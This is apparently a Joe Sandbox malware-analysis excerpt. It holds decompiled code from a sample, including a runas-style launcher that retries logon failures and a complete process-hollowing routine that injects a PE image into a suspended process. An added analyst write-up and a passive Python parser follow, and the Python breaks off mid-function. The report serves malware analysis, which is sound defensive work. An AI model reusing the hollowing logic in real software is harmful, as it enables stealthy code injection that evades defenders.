                                              										__eflags = _t227;
                                              										_v4088 = _t227;
                                              										if(_t227 != 0) {
                                              											goto L101;
                                              										}
                                              										_t275 = _v4072;
                                              										__eflags = _t275;
                                              										_t229 =  &_v3284;
                                              										_v3948 = 0x44;
                                              										_v3904 = 1;
                                              										_v3900 = 1;
                                              										__imp__CreateProcessWithLogonW( &_v2084, _t339, _t229, (0 | _t275 != 0x00000000) + 1, 0, _v4068, 0, 0, 0,  &_v3948,  &_v4060);
                                              										__eflags = _t229;
                                              										if(_t229 != 0) {
                                              											__eflags = _t275;
                                              											if(_t275 == 0) {
                                              												L37:
                                              												__eflags = _v4132 - 0x52e;
                                              												if(_v4132 == 0x52e) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x8007052e;
                                              												if(_v4132 == 0x8007052e) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc000006d;
                                              												if(_v4132 == 0xc000006d) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd000006d;
                                              												if(_v4132 == 0xd000006d) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 5;
                                              												if(_v4132 == 5) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x80070005;
                                              												if(_v4132 == 0x80070005) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc0000022;
                                              												if(_v4132 == 0xc0000022) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd0000022;
                                              												if(_v4132 == 0xd0000022) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x56;
                                              												if(_v4132 == 0x56) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x80070056;
                                              												if(_v4132 == 0x80070056) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc000006a;
                                              												if(_v4132 == 0xc000006a) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd000006a;
                                              												if(_v4132 == 0xd000006a) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x8009030e;
                                              												if(_v4132 == 0x8009030e) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x8009030c;
                                              												if(_v4132 == 0x8009030c) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x4f1;
                                              												if(_v4132 == 0x4f1) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x800704f1;
                                              												if(_v4132 == 0x800704f1) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc0000388;
                                              												if(_v4132 == 0xc0000388) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd0000388;
                                              												if(_v4132 == 0xd0000388) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x532;
                                              												if(_v4132 == 0x532) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x80070532;
                                              												if(_v4132 == 0x80070532) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc0000071;
                                              												if(_v4132 == 0xc0000071) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd0000071;
                                              												if(_v4132 == 0xd0000071) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x773;
                                              												if(_v4132 == 0x773) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x80070773;
                                              												if(_v4132 == 0x80070773) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc0000224;
                                              												if(_v4132 == 0xc0000224) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd0000224;
                                              												if(_v4132 == 0xd0000224) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x8c2;
                                              												if(_v4132 == 0x8c2) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x800708c2;
                                              												if(_v4132 == 0x800708c2) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x78f;
                                              												if(_v4132 == 0x78f) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x8007078f;
                                              												if(_v4132 == 0x8007078f) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc0000413;
                                              												if(_v4132 == 0xc0000413) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd0000413;
                                              												if(_v4132 == 0xd0000413) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x533;
                                              												if(_v4132 == 0x533) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x80070533;
                                              												if(_v4132 == 0x80070533) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc0000072;
                                              												if(_v4132 == 0xc0000072) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd0000072;
                                              												if(_v4132 == 0xd0000072) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x52f;
                                              												if(_v4132 == 0x52f) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x8007052f;
                                              												if(_v4132 == 0x8007052f) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc000006e;
                                              												if(_v4132 == 0xc000006e) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd000006e;
                                              												if(_v4132 == 0xd000006e) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x775;
                                              												if(_v4132 == 0x775) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x80070775;
                                              												if(_v4132 == 0x80070775) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc0000234;
                                              												if(_v4132 == 0xc0000234) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd0000234;
                                              												if(_v4132 == 0xd0000234) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x701;
                                              												if(_v4132 == 0x701) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x80070701;
                                              												if(_v4132 == 0x80070701) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc0000193;
                                              												if(_v4132 == 0xc0000193) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd0000193;
                                              												if(_v4132 == 0xd0000193) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x569;
                                              												if(_v4132 == 0x569) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x80070569;
                                              												if(_v4132 == 0x80070569) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc000015b;
                                              												if(_v4132 == 0xc000015b) {
                                              													continue;
                                              												}
                                              												_t230 = _v4132;
                                              												__eflags = _t230 - 0xd000015b;
                                              												if(_t230 == 0xd000015b) {
                                              													continue;
                                              												}
                                              												__eflags = _t230;
                                              												if(_t230 == 0) {
                                              													L95:
                                              													CloseHandle(_v4104);
                                              													CloseHandle(_v4100);
                                              													goto L101;
                                              												}
                                              												E00401880(L"Error launching application", _t230);
                                              												_t361 = _t361 + 4;
                                              												goto L101;
                                              											}
                                              											E00403926( &(_v3876.dwYSize), 0x104);
                                              											_t237 = E0040360D( &(_v3876.dwYSize), L"cmd.exe");
                                              											_t361 = _t361 + 0x10;
                                              											__eflags = _t237;
                                              											if(_t237 != 0) {
                                              												goto L37;
                                              											}
                                              											_t238 = EnumWindows(E00402000,  &_v4096);
                                              											__eflags = _t238;
                                              											if(_t238 != 0) {
                                              												_t340 = _v4092;
                                              												while(1) {
                                              													__eflags = _v4100;
                                              													if(_v4100 == 0) {
                                              														goto L95;
                                              													}
                                              													_t239 = _t340;
                                              													_t340 = _t340 + 1;
                                              													__eflags = _t239 - 5;
                                              													if(_t239 >= 5) {
                                              														goto L95;
                                              													}
                                              													Sleep(0xa);
                                              													_t240 = EnumWindows(E00402000,  &_v4100);
                                              													__eflags = _t240;
                                              													if(_t240 != 0) {
                                              														continue;
                                              													}
                                              													goto L95;
                                              												}
                                              												goto L95;
                                              											}
                                              											goto L37;
                                              										}
                                              										_v4132 = GetLastError();
                                              										goto L37;
                                              									}
                                              									goto L101;
                                              								}
                                              								E00401880(L"Error launching program", _t218);
                                              								_t361 = _t367 + 4;
                                              								goto L101;
                                              							}
                                              							__eflags = _t272 - 2;
                                              							if(_t272 <= 2) {
                                              								L22:
                                              								_t244 = _v4081;
                                              								L23:
                                              								__eflags = _t244;
                                              								_t245 = E00401930(_t285 & 0xffffff00 | _t244 == 0x00000000);
                                              								_t361 = _t365 + 4;
                                              								_v4088 = _t245;
                                              								goto L101;
                                              							}
                                              							_t247 = E0040346A( *(_v4080 + 8),  *(_v4080 + 8), L"/quiet");
                                              							_t365 = _t365 + 8;
                                              							__eflags = _t247;
                                              							_t244 = 1;
                                              							if(_t247 == 0) {
                                              								goto L23;
                                              							}
                                              							goto L22;
                                              						}
                                              						__eflags = _t272 - 2;
                                              						if(_t272 <= 2) {
                                              							L17:
                                              							_t248 = _v4081;
                                              							L18:
                                              							__eflags = _t248;
                                              							_t251 = E00401BA0(1, _t344, _t248, _t248 & 0xffffff00 | _t248 == 0x00000000);
                                              							_t361 = _t364 + 4;
                                              							_v4088 = _t251;
                                              							goto L101;
                                              						}
                                              						_t252 = E0040346A(_t213,  *(_v4080 + 8), L"/quiet");
                                              						_t364 = _t364 + 8;
                                              						__eflags = _t252;
                                              						_t248 = 1;
                                              						if(_t252 == 0) {
                                              							goto L18;
                                              						}
                                              						goto L17;
                                              					}
                                              					__eflags = _t272 - 2;
                                              					if(_t272 <= 2) {
                                              						L12:
                                              						_t253 = _v4081;
                                              						L13:
                                              						__eflags = _t253;
                                              						_t255 = E00401BA0(0, _t344, _t253, _t312 & 0xffffff00 | _t253 == 0x00000000);
                                              						_t361 = _t363 + 4;
                                              						_v4088 = _t255;
                                              						goto L101;
                                              					}
                                              					_t257 = E0040346A(_v4080,  *(_v4080 + 8), L"/quiet");
                                              					_t363 = _t363 + 8;
                                              					__eflags = _t257;
                                              					_t253 = 1;
                                              					if(_t257 == 0) {
                                              						goto L13;
                                              					}
                                              					goto L12;
                                              				}
                                              				_t353 = 2;
                                              				if(_t272 <= 2) {
                                              					goto L28;
                                              				}
                                              				_t258 = E0040346A(_t210,  *(_v4080 + 8), L"/netonly");
                                              				_t362 = _t362 + 8;
                                              				if(_t258 == 0) {
                                              					_t30 = _t258 + 3; // 0x3
                                              					_t353 = _t30;
                                              					SetEnvironmentVariableW(L"__COMPAT_LAYER", L"RunAsInvoker");
                                              				}
                                              				if(_t272 <= _t353) {
                                              					goto L28;
                                              				}
                                              				E00409280(_t339,  &(_v3876.lpReserved), 0, 0x40);
                                              				_v4040.hProcess = 0;
                                              				_v4040.hThread = 0;
                                              				_v4040.dwProcessId = 0;
                                              				_v4040.dwThreadId = 0;
                                              				_v3876.cb = 0x44;
                                              				_v3876.wShowWindow = 1;
                                              				E004036E5(0,  &_v1052, 0x208, L"cmd /c start ");
                                              				E0040366B( *((intOrPtr*)(_v4080 + _t353 * 4)),  &_v1052, 0x208,  *((intOrPtr*)(_v4080 + _t353 * 4)));
                                              				_t361 = _t362 + 0x24;
                                              				if(CreateProcessW(0,  &_v1052, 0, 0, 0, 0x8000000, 0, 0,  &_v3876,  &_v4040) == 0) {
                                              					_v4088 = GetLastError();
                                              				}
                                              				goto L101;
                                              			}
                                              0x00402545
                                              0x0040283b
                                              0x00402840
                                              0x00402840
                                              0x00402845
                                              0x00000000
                                              0x00000000
                                              0x00402847
                                              0x00402849
                                              0x0040284b
                                              0x0040284e
                                              0x00000000
                                              0x00000000
                                              0x00402852
                                              0x0040285e
                                              0x00402864
                                              0x00402866
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00402866
                                              0x00000000
                                              0x00402840
                                              0x00000000
                                              0x00402545
                                              0x004024fe
                                              0x00000000
                                              0x004024fe
                                              0x00000000
                                              0x00402414
                                              0x004023d9
                                              0x004023de
                                              0x00000000
                                              0x004023de
                                              0x00402335
                                              0x00402338
                                              0x00402355
                                              0x00402355
                                              0x00402359
                                              0x00402359
                                              0x0040235f
                                              0x00402364
                                              0x00402367
                                              0x00000000
                                              0x00402367
                                              0x00402347
                                              0x0040234c
                                              0x0040234f
                                              0x00402351
                                              0x00402353
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00402353
                                              0x004022e4
                                              0x004022e7
                                              0x00402304
                                              0x00402304
                                              0x00402308
                                              0x00402308
                                              0x00402310
                                              0x00402315
                                              0x00402318
                                              0x00000000
                                              0x00402318
                                              0x004022f6
                                              0x004022fb
                                              0x004022fe
                                              0x00402300
                                              0x00402302
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00402302
                                              0x00402293
                                              0x00402296
                                              0x004022b3
                                              0x004022b3
                                              0x004022b7
                                              0x004022b7
                                              0x004022bf
                                              0x004022c4
                                              0x004022c7
                                              0x00000000
                                              0x004022c7
                                              0x004022a5
                                              0x004022aa
                                              0x004022ad
                                              0x004022af
                                              0x004022b1
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x004022b1
                                              0x00402185
                                              0x0040218c
                                              0x00000000
                                              0x00000000
                                              0x0040219f
                                              0x004021a4
                                              0x004021a9
                                              0x004021b5
                                              0x004021b5
                                              0x004021b8
                                              0x004021b8
                                              0x004021c0
                                              0x00000000
                                              0x00000000
                                              0x004021d2
                                              0x004021ee
                                              0x004021f6
                                              0x004021fa
                                              0x004021fe
                                              0x00402202
                                              0x0040220d
                                              0x00402217
                                              0x00402234
                                              0x00402239
                                              0x0040226a
                                              0x00402276
                                              0x00402276
                                              0x00000000

                                              APIs
                                              • _memset.LIBCMT ref: 00402091
                                              • _memset.LIBCMT ref: 004020AF
                                              • _memset.LIBCMT ref: 004020CD
                                              • _memset.LIBCMT ref: 004020EB
                                              • _memset.LIBCMT ref: 00402105
                                                • Part of subcall function 00401800: __wcsicmp.LIBCMT ref: 00401819
                                                • Part of subcall function 00401800: __wcsicmp.LIBCMT ref: 0040182E
                                              • __wcsicmp.LIBCMT ref: 0040215D
                                              • __wcsicmp.LIBCMT ref: 00402175
                                              • __wcsicmp.LIBCMT ref: 0040219F
                                                • Part of subcall function 0040346A: __wcsicmp_l.LIBCMT ref: 004034F0
                                              • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,RunAsInvoker), ref: 004021B8
                                              • _memset.LIBCMT ref: 004021D2
                                              • _wcscpy_s.LIBCMT ref: 00402217
                                              • _wcscat_s.LIBCMT ref: 00402234
                                              • CreateProcessW.KERNEL32 ref: 00402262
                                              • GetLastError.KERNEL32(?,?,?,?,00000208,cmd /c start ), ref: 00402270
                                              • __wcsicmp.LIBCMT ref: 00402287
                                              • __wcsicmp.LIBCMT ref: 004022A5
                                              • __wcsicmp.LIBCMT ref: 004022D8
                                              • __wcsicmp.LIBCMT ref: 004022F6
                                              • __wcsicmp.LIBCMT ref: 00402329
                                              • __wcsicmp.LIBCMT ref: 00402347
                                              • __wcsicmp.LIBCMT ref: 00402378
                                              • _wcscpy_s.LIBCMT ref: 004023B1
                                              • _memset.LIBCMT ref: 00402423
                                              • _memset.LIBCMT ref: 0040243A
                                              • _memset.LIBCMT ref: 00402451
                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000), ref: 004024EE
                                              • GetLastError.KERNEL32 ref: 004024F8
                                                • Part of subcall function 00403926: __wcslwr_s_l.LIBCMT ref: 00403930
                                              • EnumWindows.USER32(00402000,?), ref: 0040253D
                                              • Sleep.KERNEL32(0000000A), ref: 00402852
                                              • EnumWindows.USER32(00402000,00000000), ref: 0040285E
                                              • CloseHandle.KERNEL32(?), ref: 00402873
                                              • CloseHandle.KERNEL32(?), ref: 0040287A
                                              • LoadIconW.USER32 ref: 004028B7
                                              • LoadIconW.USER32(?,ICON), ref: 004028C3
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004028D2
                                              • RegisterClassExW.USER32 ref: 004028F5
                                              • CreateDialogParamW.USER32 ref: 00402908
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402921
                                              • IsDialogMessageW.USER32(00000000,?), ref: 0040292D
                                              • TranslateMessage.USER32(?), ref: 0040293C
                                              • DispatchMessageW.USER32 ref: 00402947
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402958
                                              • LocalFree.KERNEL32(?,?,AboutUsage,00000000,Function_00001D50,00000000,?,?,?,?,ICON), ref: 0040296B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: __wcsicmp$_memset$Message$CreateLoad$CloseDialogEnumErrorHandleIconLastProcessWindows_wcscpy_s$ClassCursorDispatchEnvironmentFreeLocalLogonParamRegisterSleepTranslateVariableWith__wcsicmp_l__wcslwr_s_l_wcscat_s
                                              • String ID: /netonly$/quiet$/raw$/reg$/regnetonly$/unreg$0$AboutUsage$D$D$Error launching application$Error launching program$ICON$RunAsInvoker$SHELLRUNAS$W$__COMPAT_LAYER$cmd /c start $cmd.exe
                                              • API String ID: 417924082-754762936
                                              • Opcode ID: 272b203ec08cb67b929b858a7bb471570156c7c47330ce23cc0cfe630b3236f6
                                              • Instruction ID: b9bcd2630ba5b8b6581695927ee2c04d685a99353c32d213ca7add1f89437002
                                              • Opcode Fuzzy Hash: 272b203ec08cb67b929b858a7bb471570156c7c47330ce23cc0cfe630b3236f6
                                              • Instruction Fuzzy Hash: 81228F71508300AFD728DB29C949B9BB7E8AB84305F04883EF598762D1D7BD9944CF6B
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 84%
                                              			E02B522F0(void* __ebx, signed int __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, intOrPtr* _a8) {
                                              				signed int _v12;
                                              				struct _CONTEXT _v736;
                                              				void _v740;
                                              				signed int _v744;
                                              				void _v748;
                                              				struct _PROCESS_INFORMATION _v768;
                                              				WCHAR* _v772;
                                              				signed int _v776;
                                              				intOrPtr* _v780;
                                              				void _v784;
                                              				WCHAR* _v788;
                                              				struct _MEMORY_BASIC_INFORMATION _v816;
                                              				intOrPtr _v836;
                                              				char _v840;
                                              				struct _STARTUPINFOW _v912;
                                              				signed int _t102;
                                              				void* _t106;
                                              				int _t110;
                                              				intOrPtr* _t119;
                                              				intOrPtr _t140;
                                              				signed int _t144;
                                              				intOrPtr _t171;
                                              				void* _t173;
                                              				intOrPtr _t186;
                                              				unsigned int _t187;
                                              				signed int _t189;
                                              				void* _t192;
                                              				intOrPtr _t193;
                                              				WCHAR* _t196;
                                              				void* _t197;
                                              				unsigned int _t200;
                                              				intOrPtr* _t203;
                                              				WCHAR* _t204;
                                              				intOrPtr* _t207;
                                              				intOrPtr* _t209;
                                              				WCHAR* _t210;
                                              				signed int _t211;
                                              				void* _t213;
                                              				signed int _t216;
                                              				signed int _t217;
                                              				void* _t219;
                                              				void* _t221;
                                              				intOrPtr* _t223;
                                              				signed int _t225;
                                              
                                              				_t102 =  *0x2b56004; // 0xbb40e64e
                                              				_v12 = _t102 ^ _t225;
                                              				_t203 = _a8;
                                              				_t209 = __edx;
                                              				_v776 = _a4;
                                              				_v744 = __ecx;
                                              				_t173 = 0;
                                              				_v780 = __edx;
                                              				_v772 = _t203;
                                              				_t106 = E02B52CE7(0,  &_v912, 0x44);
                                              				_v912.cb = 0x44;
                                              				E02B52CE7(_t106,  &_v768, 0x10);
                                              				if(E02B52730(0, _t203, _t209) != 0) {
                                              					if( *_t209 != 0x5a4d) {
                                              						goto L1;
                                              					}
                                              					_t119 =  *((intOrPtr*)(_t209 + 0x3c)) + _t209;
                                              					_v748 = _t119;
                                              					if( *_t119 != 0x4550) {
                                              						goto L1;
                                              					}
                                              					_t211 = 0;
                                              					if(_t203 == 0) {
                                              						L8:
                                              						_t204 = HeapAlloc(GetProcessHeap(), 0, 0x21c + _t211 * 2);
                                              						_v788 = _t204;
                                              						if(_t204 == 0) {
                                              							_t110 = 0;
                                              							_t210 = 0;
                                              							L36:
                                              							if(_t210 != 0) {
                                              								L39:
                                              								if(_t173 != 0) {
                                              									HeapFree(GetProcessHeap(), 0, _t173);
                                              								}
                                              								if(_t204 != 0) {
                                              									HeapFree(GetProcessHeap(), 0, _t204);
                                              								}
                                              								return E02B53C33(_v12 ^ _t225);
                                              							}
                                              							L37:
                                              							if(_v768.hProcess != 0) {
                                              								TerminateProcess(_v768.hProcess, _t110);
                                              							}
                                              							goto L39;
                                              						}
                                              						E02B52CE7(0x21c + _t211 * 2, _t204, 0x21c + _t211 * 2);
                                              						StrCatW(_t204, _v744);
                                              						if(_t211 != 0) {
                                              							StrCatW(_t204, " ");
                                              							StrCatW(_t204, _v772);
                                              						}
                                              						_t210 = 0;
                                              						if(CreateProcessW(0, _t204, 0, 0, 0, 4, 0, 0,  &_v912,  &_v768) != 0) {
                                              							_v736.ContextFlags = 0x10007;
                                              							if(GetThreadContext(_v768.hThread,  &_v736) == 0) {
                                              								goto L12;
                                              							}
                                              							E02B52CE7(_t130,  &_v840, 0x18);
                                              							_v772 = _v772 & _t173;
                                              							_push( &_v772);
                                              							_push(0x18);
                                              							_push( &_v840);
                                              							_push(0);
                                              							_push(_v768.hProcess);
                                              							if( *0x2b59390() >= 0) {
                                              								_t173 = HeapAlloc(GetProcessHeap(), 0, _v776 << 3);
                                              								_t213 = 0x10000;
                                              								_t140 =  *((intOrPtr*)(_v748 + 0x50));
                                              								_t141 =  <=  ? 0x190000 : _t140;
                                              								_v748 =  <=  ? 0x190000 : _t140;
                                              								while(1) {
                                              									VirtualQueryEx(_v768.hProcess, _t213,  &_v816, 0x1c);
                                              									_t186 = _v816.RegionSize;
                                              									_t200 = _t213;
                                              									_t213 = _v816.BaseAddress + _t186;
                                              									if(_t186 >= _v748 && _v816.Protect == 1 && _v816.State == 0x10000) {
                                              										break;
                                              									}
                                              									if(_t200 < 0x80000000) {
                                              										continue;
                                              									}
                                              									goto L15;
                                              								}
                                              								_t144 = _t200;
                                              								asm("cdq");
                                              								_t187 = _t200;
                                              								_t216 = (_t187 << 0x00000020 | _t144) >> 0x10;
                                              								_t189 = (_t187 >> 0x00000010 << 0x00000020 | _t216) << 0x10;
                                              								_t217 = _t216 << 0x10;
                                              								if(_t217 != _t144 || _t189 != _t200) {
                                              									_t144 = 0x10000 + _t217;
                                              									asm("adc ecx, 0x0");
                                              									_v748 = _t189;
                                              								}
                                              								_v748 = _t144;
                                              								_t219 = _v836 + 8;
                                              								_v776 = _t219;
                                              								if(WriteProcessMemory(_v768.hProcess, _t219,  &_v748, 4, 0) == 0 || ReadProcessMemory(_v768.hProcess, _t219,  &_v740, 4, 0) == 0 || E02B5226E(_t173, _v780, _t173, _v740) == 0) {
                                              									goto L15;
                                              								} else {
                                              									_t221 =  *((intOrPtr*)(_t173 + 0x3c)) + _t173;
                                              									 *0x2b59394(_v768.hProcess, _v740);
                                              									_t192 = VirtualAllocEx(_v768.hProcess, _v740,  *(_t221 + 0x50), 0x3000, 0x40);
                                              									_v748 = _t192;
                                              									if(_t192 == 0) {
                                              										goto L15;
                                              									}
                                              									 *((intOrPtr*)(_t221 + 0x34)) = _v740;
                                              									if(WriteProcessMemory(_v768.hProcess, _t192, _t173,  *(_t221 + 0x54), 0) == 0) {
                                              										goto L15;
                                              									}
                                              									_v744 = _v744 & 0x00000000;
                                              									_t193 =  *((intOrPtr*)(_t173 + 0x3c));
                                              									if(0 >=  *(_t221 + 6)) {
                                              										L34:
                                              										_v784 = _v740;
                                              										WriteProcessMemory(_v768.hProcess, _v776,  &_v784, 4, 0);
                                              										_v736.Eax =  *((intOrPtr*)(_t221 + 0x28)) + _v784;
                                              										SetThreadContext(_v768.hThread,  &_v736);
                                              										ResumeThread(_v768.hThread);
                                              										_t210 = _v768.dwProcessId;
                                              										_t110 = 0;
                                              										goto L36;
                                              									}
                                              									_t207 = _v780 + 0x104 + _t193;
                                              									do {
                                              										WriteProcessMemory(_v768, _v748 +  *_t207,  *_t207 + _t173,  *(_t207 + 4), 0);
                                              										_t207 = _t207 + 0x28;
                                              										_t196 = _v744 + 1;
                                              										_v744 = _t196;
                                              									} while (_t196 < ( *(_t221 + 6) & 0x0000ffff));
                                              									_t204 = _v788;
                                              									goto L34;
                                              								}
                                              							}
                                              							L15:
                                              							_t110 = 0;
                                              							_t210 = 0;
                                              						} else {
                                              							L12:
                                              							_t110 = 0;
                                              						}
                                              						goto L37;
                                              					}
                                              					_t223 = _t203;
                                              					_t14 = _t223 + 2; // 0x2
                                              					_t197 = _t14;
                                              					do {
                                              						_t171 =  *_t223;
                                              						_t223 = _t223 + 2;
                                              					} while (_t171 != 0);
                                              					_t211 = _t223 - _t197 >> 1;
                                              					goto L8;
                                              				}
                                              				L1:
                                              				_t204 = _v740;
                                              				_t110 = 0;
                                              				_t210 = 0;
                                              				goto L37;
                                              			}
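The decompiled routine above is a process-hollowing loader: it starts the target with CREATE_SUSPENDED (flag 4), fetches the main thread's CONTEXT (0x10007, CONTEXT_FULL on x86), scans the child with VirtualQueryEx for a MEM_FREE/PAGE_NOACCESS hole of at least max(SizeOfImage, 0x190000) bytes, rounds the hit up to 64 KiB, stores that base in PEB+8 (ImageBaseAddress on 32-bit Windows), allocates it RWX with MEM_COMMIT|MEM_RESERVE, writes SizeOfHeaders bytes and then every section, points Eax at AddressOfEntryPoint plus the new base and resumes the thread. The following Python is an added analyst-side example, not part of the Joe Sandbox report or the sample: it reproduces only the passive half of that logic (the header walk at the hard-coded offsets and the base selection) against a constructed PE32 image and a constructed VirtualQueryEx region map, so the remote write plan can be recovered from a dumped payload without executing it. Reading the two indirect calls as NtQueryInformationProcess (*0x2b59390, 0x18-byte PROCESS_BASIC_INFORMATION) and NtUnmapViewOfSection (*0x2b59394) is an assumption from their argument shapes; the report does not name them.

```python
import struct

# Header offsets and constants the decompiled routine hard-codes.
IMAGE_DOS_SIGNATURE = 0x5A4D      # 'MZ', checked at offset 0 of the payload
IMAGE_NT_SIGNATURE = 0x4550       # 'PE\0\0', checked at e_lfanew
SECTION_HEADER_SIZE = 0x28
MIN_REGION = 0x190000             # floor applied to SizeOfImage when hunting for a hole
ALLOC_GRANULARITY = 0x10000       # the chosen base is rounded up to 64 KiB
MEM_FREE, PAGE_NOACCESS = 0x10000, 0x1
MEM_COMMIT_RESERVE, PAGE_EXECUTE_READWRITE = 0x3000, 0x40


def parse_image(buf):
    """Walk the headers as E02B522F0 does on an image-layout PE32 buffer.

    NT-relative offsets: NumberOfSections +6, AddressOfEntryPoint +0x28, SizeOfImage +0x50,
    SizeOfHeaders +0x54. The section loop starts at +0x104, which for a 0xE0-byte optional
    header is the VirtualAddress field of the first IMAGE_SECTION_HEADER (4 + 20 + 0xE0 + 0xC),
    with SizeOfRawData 4 bytes after it."""
    if struct.unpack_from('<H', buf, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise ValueError('missing MZ signature')
    nt = struct.unpack_from('<I', buf, 0x3C)[0]
    if struct.unpack_from('<I', buf, nt)[0] != IMAGE_NT_SIGNATURE:
        raise ValueError('missing PE signature')
    num_sections = struct.unpack_from('<H', buf, nt + 6)[0]
    entry_rva = struct.unpack_from('<I', buf, nt + 0x28)[0]
    size_of_image = struct.unpack_from('<I', buf, nt + 0x50)[0]
    size_of_headers = struct.unpack_from('<I', buf, nt + 0x54)[0]
    # (dest_rva, source_offset, length) in the order the sample issues WriteProcessMemory:
    # headers first, then each section copied from its VirtualAddress rather than
    # PointerToRawData, so the source buffer must already be laid out as an image.
    writes = [(0, 0, size_of_headers)]
    sec = nt + 0x104
    for _ in range(num_sections):
        va, raw_size = struct.unpack_from('<II', buf, sec)
        writes.append((va, va, raw_size))
        sec += SECTION_HEADER_SIZE
    return {'nt': nt, 'num_sections': num_sections, 'entry_rva': entry_rva,
            'size_of_image': size_of_image, 'size_of_headers': size_of_headers,
            'writes': writes}


def round_base(addr):
    """What the 64-bit shift/adc sequence in the decompile computes: round up to 64 KiB."""
    if addr % ALLOC_GRANULARITY == 0:
        return addr
    return (addr & ~(ALLOC_GRANULARITY - 1)) + ALLOC_GRANULARITY


def query_region(regions, addr):
    """Stand-in for VirtualQueryEx over a constructed (base, size, state, protect) list."""
    for base, size, state, protect in regions:
        if base <= addr < base + size:
            return base, size, state, protect
    return addr, 0x80000000, 0, 0   # nothing mapped there: the scan falls through and fails


def choose_base(regions, size_of_image):
    """Scan from 0x10000 for the first MEM_FREE/PAGE_NOACCESS hole that fits the image."""
    need = max(size_of_image, MIN_REGION)
    addr = ALLOC_GRANULARITY
    while True:
        base, size, state, protect = query_region(regions, addr)
        queried, addr = addr, base + size
        if size >= need and protect == PAGE_NOACCESS and state == MEM_FREE:
            return round_base(queried)
        if queried >= 0x80000000:   # same bound the sample checks before looping again
            return None


def plan_hollow(buf, regions, peb_address):
    """Return the remote operations the sample would perform, without performing any."""
    info = parse_image(buf)
    base = choose_base(regions, info['size_of_image'])
    if base is None:
        return None
    return {
        'base': base,
        # VirtualAllocEx(hProcess, base, SizeOfImage, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
        'alloc': (base, info['size_of_image'], MEM_COMMIT_RESERVE, PAGE_EXECUTE_READWRITE),
        'writes': [(base + rva, src, size) for rva, src, size in info['writes']],
        'peb_write': (peb_address + 8, base),   # PEB->ImageBaseAddress (32-bit layout assumed)
        'eax': base + info['entry_rva'],        # CONTEXT.Eax before SetThreadContext/ResumeThread
    }


def build_sample_image():
    """Constructed PE32 image-layout buffer (not taken from the sample) to exercise the walk."""
    nt = 0x80
    img = bytearray(0x3000)
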